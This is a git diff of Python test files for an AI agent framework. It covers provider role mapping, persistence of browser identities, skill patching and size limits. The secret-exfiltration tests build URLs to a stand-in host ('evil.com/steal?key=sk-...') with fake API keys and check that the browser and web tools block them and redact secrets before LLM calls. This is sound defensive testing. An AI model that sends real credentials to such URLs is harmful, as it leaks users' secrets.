"openai/gpt-5.4",
|
||||
"gpt-5-mini",
|
||||
"openai/codex-mini",
|
||||
"codex-mini-latest",
|
||||
"openai/codex-pro",
|
||||
])
|
||||
def test_gpt5_codex_get_developer_role(self, monkeypatch, model):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = model
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "developer"
|
||||
assert kwargs["messages"][0]["content"] == "You are helpful."
|
||||
assert kwargs["messages"][1]["role"] == "user"
|
||||
|
||||
@pytest.mark.parametrize("model", [
|
||||
"anthropic/claude-opus-4.6",
|
||||
"openai/gpt-4o",
|
||||
"google/gemini-2.5-pro",
|
||||
"deepseek/deepseek-chat",
|
||||
"openai/o3-mini",
|
||||
])
|
||||
def test_non_matching_models_keep_system_role(self, monkeypatch, model):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = model
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "system"
|
||||
|
||||
def test_no_system_message_no_crash(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = "openai/gpt-5"
|
||||
messages = [{"role": "user", "content": "hi"}]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "user"
|
||||
|
||||
def test_original_messages_not_mutated(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "openrouter")
|
||||
agent.model = "openai/gpt-5"
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
agent._build_api_kwargs(messages)
|
||||
# Original messages must be untouched (internal representation stays "system")
|
||||
assert messages[0]["role"] == "system"
|
||||
|
||||
def test_developer_role_via_nous_portal(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "nous", base_url="https://inference-api.nousresearch.com/v1")
|
||||
agent.model = "gpt-5"
|
||||
messages = [
|
||||
{"role": "system", "content": "You are helpful."},
|
||||
{"role": "user", "content": "hi"},
|
||||
]
|
||||
kwargs = agent._build_api_kwargs(messages)
|
||||
assert kwargs["messages"][0]["role"] == "developer"
|
||||
|
||||
|
||||
class TestBuildApiKwargsAIGateway:
|
||||
def test_uses_chat_completions_format(self, monkeypatch):
|
||||
agent = _make_agent(monkeypatch, "ai-gateway", base_url="https://ai-gateway.vercel.sh/v1")
|
||||
|
||||
242
tests/tools/test_browser_camofox_persistence.py
Normal file
242
tests/tools/test_browser_camofox_persistence.py
Normal file
@@ -0,0 +1,242 @@
|
||||
"""Persistence tests for the Camofox browser backend.
|
||||
|
||||
Tests that managed persistence uses stable identity while default mode
|
||||
uses random identity. The actual browser profile persistence is handled
|
||||
by the Camofox server (when CAMOFOX_PROFILE_DIR is set).
|
||||
"""
|
||||
|
||||
import json
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.browser_camofox import (
|
||||
_drop_session,
|
||||
_get_session,
|
||||
_managed_persistence_enabled,
|
||||
camofox_close,
|
||||
camofox_navigate,
|
||||
check_camofox_available,
|
||||
cleanup_all_camofox_sessions,
|
||||
get_vnc_url,
|
||||
)
|
||||
from tools.browser_camofox_state import get_camofox_identity
|
||||
|
||||
|
||||
def _mock_response(status=200, json_data=None):
|
||||
resp = MagicMock()
|
||||
resp.status_code = status
|
||||
resp.json.return_value = json_data or {}
|
||||
resp.raise_for_status = MagicMock()
|
||||
return resp
|
||||
|
||||
|
||||
def _enable_persistence():
|
||||
"""Return a patch context that enables managed persistence via config."""
|
||||
config = {"browser": {"camofox": {"managed_persistence": True}}}
|
||||
return patch("tools.browser_camofox.load_config", return_value=config)
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_session_state():
|
||||
import tools.browser_camofox as mod
|
||||
yield
|
||||
with mod._sessions_lock:
|
||||
mod._sessions.clear()
|
||||
mod._vnc_url = None
|
||||
mod._vnc_url_checked = False
|
||||
|
||||
|
||||
class TestManagedPersistenceToggle:
|
||||
def test_disabled_by_default(self):
|
||||
config = {"browser": {"camofox": {"managed_persistence": False}}}
|
||||
with patch("tools.browser_camofox.load_config", return_value=config):
|
||||
assert _managed_persistence_enabled() is False
|
||||
|
||||
def test_enabled_via_config_yaml(self):
|
||||
config = {"browser": {"camofox": {"managed_persistence": True}}}
|
||||
with patch("tools.browser_camofox.load_config", return_value=config):
|
||||
assert _managed_persistence_enabled() is True
|
||||
|
||||
def test_disabled_when_key_missing(self):
|
||||
config = {"browser": {}}
|
||||
with patch("tools.browser_camofox.load_config", return_value=config):
|
||||
assert _managed_persistence_enabled() is False
|
||||
|
||||
def test_disabled_on_config_load_error(self):
|
||||
with patch("tools.browser_camofox.load_config", side_effect=Exception("fail")):
|
||||
assert _managed_persistence_enabled() is False
|
||||
|
||||
|
||||
class TestEphemeralMode:
|
||||
"""Default behavior: random userId, no persistence."""
|
||||
|
||||
def test_session_gets_random_user_id(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
session = _get_session("task-1")
|
||||
assert session["user_id"].startswith("hermes_")
|
||||
assert session["managed"] is False
|
||||
|
||||
def test_different_tasks_get_different_user_ids(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
s1 = _get_session("task-1")
|
||||
s2 = _get_session("task-2")
|
||||
assert s1["user_id"] != s2["user_id"]
|
||||
|
||||
def test_session_reuse_within_same_task(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
s1 = _get_session("task-1")
|
||||
s2 = _get_session("task-1")
|
||||
assert s1 is s2
|
||||
|
||||
|
||||
class TestManagedPersistenceMode:
|
||||
"""With managed_persistence: stable userId derived from Hermes profile."""
|
||||
|
||||
def test_session_gets_stable_user_id(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
session = _get_session("task-1")
|
||||
expected = get_camofox_identity("task-1")
|
||||
assert session["user_id"] == expected["user_id"]
|
||||
assert session["session_key"] == expected["session_key"]
|
||||
assert session["managed"] is True
|
||||
|
||||
def test_same_user_id_after_session_drop(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
s1 = _get_session("task-1")
|
||||
uid1 = s1["user_id"]
|
||||
_drop_session("task-1")
|
||||
s2 = _get_session("task-1")
|
||||
assert s2["user_id"] == uid1
|
||||
|
||||
def test_same_user_id_across_tasks(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
s1 = _get_session("task-a")
|
||||
s2 = _get_session("task-b")
|
||||
# Same profile = same userId, different session keys
|
||||
assert s1["user_id"] == s2["user_id"]
|
||||
assert s1["session_key"] != s2["session_key"]
|
||||
|
||||
def test_different_profiles_get_different_user_ids(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-a"))
|
||||
s1 = _get_session("task-1")
|
||||
uid_a = s1["user_id"]
|
||||
_drop_session("task-1")
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-b"))
|
||||
s2 = _get_session("task-1")
|
||||
assert s2["user_id"] != uid_a
|
||||
|
||||
def test_navigate_uses_stable_identity(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
requests_seen = []
|
||||
|
||||
def _capture_post(url, json=None, timeout=None):
|
||||
requests_seen.append(json)
|
||||
return _mock_response(
|
||||
json_data={"tabId": "tab-1", "url": "https://example.com"}
|
||||
)
|
||||
|
||||
with _enable_persistence(), \
|
||||
patch("tools.browser_camofox.requests.post", side_effect=_capture_post):
|
||||
result = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
|
||||
|
||||
assert result["success"] is True
|
||||
expected = get_camofox_identity("task-1")
|
||||
assert requests_seen[0]["userId"] == expected["user_id"]
|
||||
|
||||
def test_navigate_reuses_identity_after_close(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
requests_seen = []
|
||||
|
||||
def _capture_post(url, json=None, timeout=None):
|
||||
requests_seen.append(json)
|
||||
return _mock_response(
|
||||
json_data={"tabId": f"tab-{len(requests_seen)}", "url": "https://example.com"}
|
||||
)
|
||||
|
||||
with (
|
||||
_enable_persistence(),
|
||||
patch("tools.browser_camofox.requests.post", side_effect=_capture_post),
|
||||
patch("tools.browser_camofox.requests.delete", return_value=_mock_response()),
|
||||
):
|
||||
first = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
|
||||
camofox_close("task-1")
|
||||
second = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
|
||||
|
||||
assert first["success"] is True
|
||||
assert second["success"] is True
|
||||
tab_requests = [req for req in requests_seen if "userId" in req]
|
||||
assert len(tab_requests) == 2
|
||||
assert tab_requests[0]["userId"] == tab_requests[1]["userId"]
|
||||
|
||||
|
||||
class TestVncUrlDiscovery:
|
||||
"""VNC URL is derived from the Camofox health endpoint."""
|
||||
|
||||
def test_vnc_url_from_health_port(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://myhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp):
|
||||
assert check_camofox_available() is True
|
||||
assert get_vnc_url() == "http://myhost:6080"
|
||||
|
||||
def test_vnc_url_none_when_headless(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp):
|
||||
check_camofox_available()
|
||||
assert get_vnc_url() is None
|
||||
|
||||
def test_vnc_url_rejects_invalid_port(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True, "vncPort": "bad"})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp):
|
||||
check_camofox_available()
|
||||
assert get_vnc_url() is None
|
||||
|
||||
def test_vnc_url_only_probed_once(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp) as mock_get:
|
||||
check_camofox_available()
|
||||
check_camofox_available()
|
||||
# Second call still hits /health for availability but doesn't re-parse vncPort
|
||||
assert get_vnc_url() == "http://localhost:6080"
|
||||
|
||||
def test_navigate_includes_vnc_hint(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
import tools.browser_camofox as mod
|
||||
mod._vnc_url = "http://localhost:6080"
|
||||
mod._vnc_url_checked = True
|
||||
|
||||
with patch("tools.browser_camofox.requests.post", return_value=_mock_response(
|
||||
json_data={"tabId": "t1", "url": "https://example.com"}
|
||||
)):
|
||||
result = json.loads(camofox_navigate("https://example.com", task_id="vnc-test"))
|
||||
|
||||
assert result["vnc_url"] == "http://localhost:6080"
|
||||
assert "vnc_hint" in result
|
||||
66
tests/tools/test_browser_camofox_state.py
Normal file
66
tests/tools/test_browser_camofox_state.py
Normal file
@@ -0,0 +1,66 @@
|
||||
"""Tests for Hermes-managed Camofox state helpers."""
|
||||
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
def _load_module():
|
||||
from tools import browser_camofox_state as state
|
||||
return state
|
||||
|
||||
|
||||
class TestCamofoxStatePaths:
|
||||
def test_paths_are_profile_scoped(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
assert state.get_camofox_state_dir() == tmp_path / "browser_auth" / "camofox"
|
||||
|
||||
|
||||
class TestCamofoxIdentity:
|
||||
def test_identity_is_deterministic(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
first = state.get_camofox_identity("task-1")
|
||||
second = state.get_camofox_identity("task-1")
|
||||
assert first == second
|
||||
|
||||
def test_identity_differs_by_task(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
a = state.get_camofox_identity("task-a")
|
||||
b = state.get_camofox_identity("task-b")
|
||||
# Same user (same profile), different session keys
|
||||
assert a["user_id"] == b["user_id"]
|
||||
assert a["session_key"] != b["session_key"]
|
||||
|
||||
def test_identity_differs_by_profile(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path / "profile-a"):
|
||||
a = state.get_camofox_identity("task-1")
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path / "profile-b"):
|
||||
b = state.get_camofox_identity("task-1")
|
||||
assert a["user_id"] != b["user_id"]
|
||||
|
||||
def test_default_task_id(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
identity = state.get_camofox_identity()
|
||||
assert "user_id" in identity
|
||||
assert "session_key" in identity
|
||||
assert identity["user_id"].startswith("hermes_")
|
||||
assert identity["session_key"].startswith("task_")
|
||||
|
||||
|
||||
class TestCamofoxConfigDefaults:
|
||||
def test_default_config_includes_managed_persistence_toggle(self):
|
||||
from hermes_cli.config import DEFAULT_CONFIG
|
||||
|
||||
browser_cfg = DEFAULT_CONFIG["browser"]
|
||||
assert browser_cfg["camofox"]["managed_persistence"] is False
|
||||
|
||||
def test_config_version_unchanged(self):
|
||||
from hermes_cli.config import DEFAULT_CONFIG
|
||||
|
||||
# managed_persistence is auto-merged by _deep_merge, no version bump needed
|
||||
assert DEFAULT_CONFIG["_config_version"] == 11
|
||||
186
tests/tools/test_browser_secret_exfil.py
Normal file
186
tests/tools/test_browser_secret_exfil.py
Normal file
@@ -0,0 +1,186 @@
|
||||
"""Tests for secret exfiltration prevention in browser and web tools."""
|
||||
|
||||
import json
|
||||
from unittest.mock import patch, MagicMock
|
||||
import pytest
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _ensure_redaction_enabled(monkeypatch):
|
||||
"""Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
|
||||
monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
|
||||
monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
|
||||
|
||||
|
||||
class TestBrowserSecretExfil:
|
||||
"""Verify browser_navigate blocks URLs containing secrets."""
|
||||
|
||||
def test_blocks_api_key_in_url(self):
|
||||
from tools.browser_tool import browser_navigate
|
||||
result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
|
||||
parsed = json.loads(result)
|
||||
assert parsed["success"] is False
|
||||
assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
|
||||
|
||||
def test_blocks_openrouter_key_in_url(self):
|
||||
from tools.browser_tool import browser_navigate
|
||||
result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
|
||||
parsed = json.loads(result)
|
||||
assert parsed["success"] is False
|
||||
|
||||
def test_allows_normal_url(self):
|
||||
"""Normal URLs pass the secret check (may fail for other reasons)."""
|
||||
from tools.browser_tool import browser_navigate
|
||||
result = browser_navigate("https://github.com/NousResearch/hermes-agent")
|
||||
parsed = json.loads(result)
|
||||
# Should NOT be blocked by secret detection
|
||||
assert "API key or token" not in parsed.get("error", "")
|
||||
|
||||
|
||||
class TestWebExtractSecretExfil:
|
||||
"""Verify web_extract_tool blocks URLs containing secrets."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_blocks_api_key_in_url(self):
|
||||
from tools.web_tools import web_extract_tool
|
||||
result = await web_extract_tool(
|
||||
urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
|
||||
)
|
||||
parsed = json.loads(result)
|
||||
assert parsed["success"] is False
|
||||
assert "Blocked" in parsed["error"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_allows_normal_url(self):
|
||||
from tools.web_tools import web_extract_tool
|
||||
# This will fail due to no API key, but should NOT be blocked by secret check
|
||||
result = await web_extract_tool(urls=["https://example.com"])
|
||||
parsed = json.loads(result)
|
||||
# Should fail for API/config reason, not secret blocking
|
||||
assert "API key" not in parsed.get("error", "") or "Blocked" not in parsed.get("error", "")
|
||||
|
||||
|
||||
class TestBrowserSnapshotRedaction:
|
||||
"""Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
|
||||
|
||||
def test_extract_relevant_content_redacts_secrets(self):
|
||||
"""Snapshot containing secrets should be redacted before call_llm."""
|
||||
from tools.browser_tool import _extract_relevant_content
|
||||
|
||||
# Build a snapshot with a fake Anthropic-style key embedded
|
||||
fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
|
||||
snapshot_with_secret = (
|
||||
"heading: Dashboard Settings\n"
|
||||
f"text: API Key: {fake_key}\n"
|
||||
"button [ref=e5]: Save\n"
|
||||
)
|
||||
|
||||
captured_prompts = []
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
prompt = kwargs["messages"][0]["content"]
|
||||
captured_prompts.append(prompt)
|
||||
mock_resp = MagicMock()
|
||||
mock_resp.choices = [MagicMock()]
|
||||
mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
|
||||
return mock_resp
|
||||
|
||||
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
||||
_extract_relevant_content(snapshot_with_secret, "check settings")
|
||||
|
||||
assert len(captured_prompts) == 1
|
||||
# The middle portion of the key must not appear in the prompt
|
||||
assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
|
||||
# Non-secret content should survive
|
||||
assert "Dashboard" in captured_prompts[0]
|
||||
assert "ref=e5" in captured_prompts[0]
|
||||
|
||||
def test_extract_relevant_content_no_task_redacts_secrets(self):
|
||||
"""Snapshot without user_task should also redact secrets."""
|
||||
from tools.browser_tool import _extract_relevant_content
|
||||
|
||||
fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
|
||||
snapshot_with_secret = (
|
||||
f"text: OPENAI_API_KEY={fake_key}\n"
|
||||
"link [ref=e2]: Home\n"
|
||||
)
|
||||
|
||||
captured_prompts = []
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
prompt = kwargs["messages"][0]["content"]
|
||||
captured_prompts.append(prompt)
|
||||
mock_resp = MagicMock()
|
||||
mock_resp.choices = [MagicMock()]
|
||||
mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
|
||||
return mock_resp
|
||||
|
||||
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
||||
_extract_relevant_content(snapshot_with_secret)
|
||||
|
||||
assert len(captured_prompts) == 1
|
||||
assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
|
||||
|
||||
def test_extract_relevant_content_normal_snapshot_unchanged(self):
|
||||
"""Snapshot without secrets should pass through normally."""
|
||||
from tools.browser_tool import _extract_relevant_content
|
||||
|
||||
normal_snapshot = (
|
||||
"heading: Welcome\n"
|
||||
"text: Click the button below to continue\n"
|
||||
"button [ref=e1]: Continue\n"
|
||||
)
|
||||
|
||||
captured_prompts = []
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
prompt = kwargs["messages"][0]["content"]
|
||||
captured_prompts.append(prompt)
|
||||
mock_resp = MagicMock()
|
||||
mock_resp.choices = [MagicMock()]
|
||||
mock_resp.choices[0].message.content = "Welcome page with continue button"
|
||||
return mock_resp
|
||||
|
||||
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
||||
_extract_relevant_content(normal_snapshot, "proceed")
|
||||
|
||||
assert len(captured_prompts) == 1
|
||||
assert "Welcome" in captured_prompts[0]
|
||||
assert "Continue" in captured_prompts[0]
|
||||
|
||||
|
||||
class TestCamofoxAnnotationRedaction:
|
||||
"""Verify annotation context is redacted before vision LLM call."""
|
||||
|
||||
def test_annotation_context_secrets_redacted(self):
|
||||
"""Secrets in accessibility tree annotation should be masked."""
|
||||
from agent.redact import redact_sensitive_text
|
||||
|
||||
fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
|
||||
annotation = (
|
||||
"\n\nAccessibility tree (element refs for interaction):\n"
|
||||
f"text: Token: {fake_token}\n"
|
||||
"button [ref=e3]: Copy\n"
|
||||
)
|
||||
result = redact_sensitive_text(annotation)
|
||||
assert "FAKEGITHUBTOKEN123456789" not in result
|
||||
# Non-secret parts preserved
|
||||
assert "button" in result
|
||||
assert "ref=e3" in result
|
||||
|
||||
def test_annotation_env_dump_redacted(self):
|
||||
"""Env var dump in annotation context should be redacted."""
|
||||
from agent.redact import redact_sensitive_text
|
||||
|
||||
fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
|
||||
fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
|
||||
annotation = (
|
||||
"\n\nAccessibility tree (element refs for interaction):\n"
|
||||
f"text: ANTHROPIC_API_KEY={fake_anth}\n"
|
||||
f"text: OPENAI_API_KEY={fake_oai}\n"
|
||||
"text: PATH=/usr/local/bin\n"
|
||||
)
|
||||
result = redact_sensitive_text(annotation)
|
||||
assert "ANTHROPICFAKEKEY123456789" not in result
|
||||
assert "OPENAIFAKEKEY99887766" not in result
|
||||
assert "PATH=/usr/local/bin" in result
|
||||
174
tests/tools/test_skill_improvements.py
Normal file
174
tests/tools/test_skill_improvements.py
Normal file
@@ -0,0 +1,174 @@
|
||||
"""Tests for skill fuzzy patching via tools.fuzzy_match."""
|
||||
|
||||
import json
|
||||
import os
|
||||
from pathlib import Path
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.skill_manager_tool import (
|
||||
_create_skill,
|
||||
_patch_skill,
|
||||
_write_file,
|
||||
skill_manage,
|
||||
)
|
||||
|
||||
|
||||
SKILL_CONTENT = """\
|
||||
---
|
||||
name: test-skill
|
||||
description: A test skill for unit testing.
|
||||
---
|
||||
|
||||
# Test Skill
|
||||
|
||||
Step 1: Do the thing.
|
||||
Step 2: Do another thing.
|
||||
Step 3: Final step.
|
||||
"""
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fuzzy patching
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestFuzzyPatchSkill:
|
||||
@pytest.fixture(autouse=True)
|
||||
def setup_skills(self, tmp_path, monkeypatch):
|
||||
skills_dir = tmp_path / "skills"
|
||||
skills_dir.mkdir()
|
||||
monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
self.skills_dir = skills_dir
|
||||
|
||||
def test_exact_match_still_works(self):
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
result = _patch_skill("test-skill", "Step 1: Do the thing.", "Step 1: Done!")
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "test-skill" / "SKILL.md").read_text()
|
||||
assert "Step 1: Done!" in content
|
||||
|
||||
def test_whitespace_trimmed_match(self):
|
||||
"""Patch with extra leading whitespace should still find the target."""
|
||||
skill = """\
|
||||
---
|
||||
name: ws-skill
|
||||
description: Whitespace test
|
||||
---
|
||||
|
||||
# Commands
|
||||
|
||||
def hello():
|
||||
print("hi")
|
||||
"""
|
||||
_create_skill("ws-skill", skill)
|
||||
# Agent sends patch with no leading whitespace (common LLM behaviour)
|
||||
result = _patch_skill("ws-skill", "def hello():\n print(\"hi\")", "def hello():\n print(\"hello world\")")
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "ws-skill" / "SKILL.md").read_text()
|
||||
assert 'print("hello world")' in content
|
||||
|
||||
def test_indentation_flexible_match(self):
|
||||
"""Patch where only indentation differs should succeed."""
|
||||
skill = """\
|
||||
---
|
||||
name: indent-skill
|
||||
description: Indentation test
|
||||
---
|
||||
|
||||
# Steps
|
||||
|
||||
1. First step
|
||||
2. Second step
|
||||
3. Third step
|
||||
"""
|
||||
_create_skill("indent-skill", skill)
|
||||
# Agent sends with different indentation
|
||||
result = _patch_skill(
|
||||
"indent-skill",
|
||||
"1. First step\n2. Second step",
|
||||
"1. Updated first\n2. Updated second"
|
||||
)
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "indent-skill" / "SKILL.md").read_text()
|
||||
assert "Updated first" in content
|
||||
|
||||
def test_multiple_matches_blocked_without_replace_all(self):
|
||||
"""Multiple fuzzy matches should return an error without replace_all."""
|
||||
skill = """\
|
||||
---
|
||||
name: dup-skill
|
||||
description: Duplicate test
|
||||
---
|
||||
|
||||
# Steps
|
||||
|
||||
word word word
|
||||
"""
|
||||
_create_skill("dup-skill", skill)
|
||||
result = _patch_skill("dup-skill", "word", "replaced")
|
||||
assert result["success"] is False
|
||||
assert "match" in result["error"].lower()
|
||||
|
||||
def test_replace_all_with_fuzzy(self):
|
||||
skill = """\
|
||||
---
|
||||
name: dup-skill
|
||||
description: Duplicate test
|
||||
---
|
||||
|
||||
# Steps
|
||||
|
||||
word word word
|
||||
"""
|
||||
_create_skill("dup-skill", skill)
|
||||
result = _patch_skill("dup-skill", "word", "replaced", replace_all=True)
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "dup-skill" / "SKILL.md").read_text()
|
||||
assert "word" not in content
|
||||
assert "replaced" in content
|
||||
|
||||
def test_no_match_returns_preview(self):
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
result = _patch_skill("test-skill", "this does not exist anywhere", "replacement")
|
||||
assert result["success"] is False
|
||||
assert "file_preview" in result
|
||||
|
||||
def test_fuzzy_patch_on_supporting_file(self):
|
||||
"""Fuzzy matching should also work on supporting files."""
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
ref_content = " function hello() {\n console.log('hi');\n }"
|
||||
_write_file("test-skill", "references/code.js", ref_content)
|
||||
# Patch with stripped indentation
|
||||
result = _patch_skill(
|
||||
"test-skill",
|
||||
"function hello() {\nconsole.log('hi');\n}",
|
||||
"function hello() {\nconsole.log('hello world');\n}",
|
||||
file_path="references/code.js"
|
||||
)
|
||||
assert result["success"] is True
|
||||
content = (self.skills_dir / "test-skill" / "references" / "code.js").read_text()
|
||||
assert "hello world" in content
|
||||
|
||||
def test_patch_preserves_frontmatter_validation(self):
|
||||
"""Fuzzy matching should still run frontmatter validation on SKILL.md."""
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
# Try to destroy the frontmatter via patch
|
||||
result = _patch_skill("test-skill", "---\nname: test-skill", "BROKEN")
|
||||
assert result["success"] is False
|
||||
assert "structure" in result["error"].lower() or "frontmatter" in result["error"].lower()
|
||||
|
||||
def test_skill_manage_patch_uses_fuzzy(self):
|
||||
"""The dispatcher should route to the fuzzy-matching patch."""
|
||||
_create_skill("test-skill", SKILL_CONTENT)
|
||||
raw = skill_manage(
|
||||
action="patch",
|
||||
name="test-skill",
|
||||
old_string=" Step 1: Do the thing.", # extra leading space
|
||||
new_string="Step 1: Updated.",
|
||||
)
|
||||
result = json.loads(raw)
|
||||
# Should succeed via line-trimmed or indentation-flexible matching
|
||||
assert result["success"] is True
|
||||
@@ -271,7 +271,7 @@ class TestPatchSkill:
|
||||
_create_skill("my-skill", VALID_SKILL_CONTENT)
|
||||
result = _patch_skill("my-skill", "this text does not exist", "replacement")
|
||||
assert result["success"] is False
|
||||
assert "not found" in result["error"]
|
||||
assert "not found" in result["error"].lower() or "could not find" in result["error"].lower()
|
||||
|
||||
def test_patch_ambiguous_match_rejected(self, tmp_path):
|
||||
content = """\
|
||||
@@ -288,7 +288,7 @@ word word
|
||||
_create_skill("my-skill", content)
|
||||
result = _patch_skill("my-skill", "word", "replaced")
|
||||
assert result["success"] is False
|
||||
assert "matched" in result["error"]
|
||||
assert "match" in result["error"].lower()
|
||||
|
||||
def test_patch_replace_all(self, tmp_path):
|
||||
content = """\
|
||||
|
||||
215
tests/tools/test_skill_size_limits.py
Normal file
215
tests/tools/test_skill_size_limits.py
Normal file
@@ -0,0 +1,215 @@
|
||||
"""Tests for skill content size limits.
|
||||
|
||||
Agent writes (create/edit/patch/write_file) are constrained to
|
||||
MAX_SKILL_CONTENT_CHARS (100k) and MAX_SKILL_FILE_BYTES (1 MiB).
|
||||
Hand-placed and hub-installed skills have no hard limit.
